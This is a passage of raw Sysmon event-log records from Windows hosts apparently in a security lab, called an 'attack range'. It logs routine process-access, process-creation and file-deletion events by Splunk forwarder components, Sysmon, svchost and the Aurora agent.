Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E53C-63C7-1C02-00000000B002}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017467Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.299{E5A8D418-E53C-63C7-1C02-00000000B002}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.506{FE4C2B44-E53C-63C7-6706-00000000AF02}5664512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E53C-63C7-6706-00000000AF02}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E53C-63C7-6706-00000000AF02}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.350{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E53C-63C7-6706-00000000AF02}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.351{FE4C2B44-E53C-63C7-6706-00000000AF02}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.193{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000044963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.191{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E80803A22FC789461CEC0F6B186EE14E,SHA256=5AAAE0111D33E2136144C4709C15D8C772DF6386D8DEBF170D266822FC4B8977,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F9980CD529D68E515FE1F7660DCE70,SHA256=A5048F4C0563FF9DF52691D21908E092DACF43D5A1EC06E062913356FAA17950,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E53D-63C7-6906-00000000AF02}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E53D-63C7-6906-00000000AF02}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.825{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E53D-63C7-6906-00000000AF02}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.826{FE4C2B44-E53D-63C7-6906-00000000AF02}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017495Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:33.143{E5A8D418-E53C-63C7-1D02-00000000B002}162832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.174{FE4C2B44-E53D-63C7-6806-00000000AF02}42526624C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program 